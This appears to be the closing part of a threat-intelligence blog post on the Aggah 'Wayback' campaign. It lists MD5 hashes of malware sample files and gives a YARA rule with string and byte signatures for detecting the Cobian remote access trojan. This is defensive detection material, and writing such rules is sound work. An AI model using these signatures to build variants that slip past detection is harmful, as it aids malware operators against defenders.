		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/31-3.txt_a6.bin
		64e017288557dabf4f540d478d4e06c8  FTp-120-May12/3-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/3-1.txt_555.bin
		f9d7a66942ed0f0ae96b023e638fca4a  FTp-120-May12/32-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/32-1.txt_555.bin
		f9d7a66942ed0f0ae96b023e638fca4a  FTp-120-May12/32-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/32-2.txt_555.bin
		f9d7a66942ed0f0ae96b023e638fca4a  FTp-120-May12/32-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/32-3.txt_a6.bin
		64e017288557dabf4f540d478d4e06c8  FTp-120-May12/3-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/3-2.txt_555.bin
		7d6f2f0134e65736a1fff8e5623c7439  FTp-120-May12/33-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/33-1.txt_555.bin
		7d6f2f0134e65736a1fff8e5623c7439  FTp-120-May12/33-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/33-2.txt_555.bin
		7d6f2f0134e65736a1fff8e5623c7439  FTp-120-May12/33-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/33-3.txt_a6.bin
		64e017288557dabf4f540d478d4e06c8  FTp-120-May12/3-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/3-3.txt_a6.bin
		6e6a9b610b358448f54c21d873fe7a14  FTp-120-May12/34-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/34-1.txt_555.bin
		6e6a9b610b358448f54c21d873fe7a14  FTp-120-May12/34-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/34-2.txt_555.bin
		6e6a9b610b358448f54c21d873fe7a14  FTp-120-May12/34-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/34-3.txt_a6.bin
		ab67407874b24aa679d28e972212a5ed  FTp-120-May12/35-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/35-1.txt_555.bin
		ab67407874b24aa679d28e972212a5ed  FTp-120-May12/35-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/35-2.txt_555.bin
		ab67407874b24aa679d28e972212a5ed  FTp-120-May12/35-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/35-3.txt_a6.bin
		15d40ecf020af659150302e04b33dae6  FTp-120-May12/36-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/36-1.txt_555.bin
		15d40ecf020af659150302e04b33dae6  FTp-120-May12/36-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/36-2.txt_555.bin
		15d40ecf020af659150302e04b33dae6  FTp-120-May12/36-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/36-3.txt_a6.bin
		04be7cf8391d69938d99db901c920fbb  FTp-120-May12/37-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/37-1.txt_555.bin
		04be7cf8391d69938d99db901c920fbb  FTp-120-May12/37-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/37-2.txt_555.bin
		04be7cf8391d69938d99db901c920fbb  FTp-120-May12/37-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/37-3.txt_a6.bin
		a75abca0772cd59abeb9250d60012c5d  FTp-120-May12/38-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/38-1.txt_555.bin
		a75abca0772cd59abeb9250d60012c5d  FTp-120-May12/38-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/38-2.txt_555.bin
		a75abca0772cd59abeb9250d60012c5d  FTp-120-May12/38-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/38-3.txt_a6.bin
		492f7a55ec42c8bece7643ce12c0271f  FTp-120-May12/39-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/39-1.txt_555.bin
		492f7a55ec42c8bece7643ce12c0271f  FTp-120-May12/39-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/39-2.txt_555.bin
		492f7a55ec42c8bece7643ce12c0271f  FTp-120-May12/39-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/39-3.txt_a6.bin
		3ba878551d0d18031cf75b915d0ae36d  FTp-120-May12/40-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/40-1.txt_555.bin
		3ba878551d0d18031cf75b915d0ae36d  FTp-120-May12/40-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/40-2.txt_555.bin
		3ba878551d0d18031cf75b915d0ae36d  FTp-120-May12/40-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/40-3.txt_a6.bin
		e5e0b2506253ca8d31ebc4606ad20ca2  FTp-120-May12/4-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/4-1.txt_555.bin
		e5e0b2506253ca8d31ebc4606ad20ca2  FTp-120-May12/4-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/4-2.txt_555.bin
		e5e0b2506253ca8d31ebc4606ad20ca2  FTp-120-May12/4-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/4-3.txt_a6.bin
		30d116ed7f5d871c7510d3a59efb8d1a  FTp-120-May12/5-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/5-1.txt_555.bin
		30d116ed7f5d871c7510d3a59efb8d1a  FTp-120-May12/5-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/5-2.txt_555.bin
		30d116ed7f5d871c7510d3a59efb8d1a  FTp-120-May12/5-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/5-3.txt_a6.bin
		2c2fa0e0b9b5b4d4763f15d3e3f08f6b  FTp-120-May12/6-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/6-1.txt_555.bin
		2c2fa0e0b9b5b4d4763f15d3e3f08f6b  FTp-120-May12/6-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/6-2.txt_555.bin
		2c2fa0e0b9b5b4d4763f15d3e3f08f6b  FTp-120-May12/6-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/6-3.txt_a6.bin
		0761a8acb23616642ded68a2dd191fd1  FTp-120-May12/7-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/7-1.txt_555.bin
		0761a8acb23616642ded68a2dd191fd1  FTp-120-May12/7-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/7-2.txt_555.bin
		0761a8acb23616642ded68a2dd191fd1  FTp-120-May12/7-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/7-3.txt_a6.bin
		1da9b0985e31a795a2d8408ccfc500ec  FTp-120-May12/8-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/8-1.txt_555.bin
		1da9b0985e31a795a2d8408ccfc500ec  FTp-120-May12/8-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/8-2.txt_555.bin
		1da9b0985e31a795a2d8408ccfc500ec  FTp-120-May12/8-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/8-3.txt_a6.bin
		475b94b0eaf4a92c57f7973e8857ff7c  FTp-120-May12/9-1.txt_444.bin
		e8f49446a4809e0ba9257ec56e92ace6  FTp-120-May12/9-1.txt_555.bin
		475b94b0eaf4a92c57f7973e8857ff7c  FTp-120-May12/9-2.txt_444.bin
		c3fd6d3831644b7c3b345017edc164a1  FTp-120-May12/9-2.txt_555.bin
		475b94b0eaf4a92c57f7973e8857ff7c  FTp-120-May12/9-3.txt_a2.bin
		a72ed8a979f47a27e67a0f1d06d5bf0b  FTp-120-May12/9-3.txt_a6.bin

Yara Rules 

rule CobianRAT { 
meta: 
  	description = "Yara Rule for Cobian RAT in Aggah Wayback campaign" 
  	author = "Yoroi Malware Zlab" 
  	last_updated = "2021_06_18" 
  	tlp = "white" 
  	category = "informational" 

strings: 
$s1="bWFzdGVy" wide
$s2="Ydmzipw~" wide 

$a1={11 8E B7 16 FE 01 5F 2C 46 1B 8D 1D} 
$a2={07 17 D6 0B 07 1A 30 20 14 0C 07 B5 1F 64 28 33} 

condition: 
   uint16(0) == 0x5A4D and any of ($s*) and 1 of ($a*)
} 

This blogpost was authored by Luigi Martire and Luca Mella of Yoroi Malware ZLAB

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram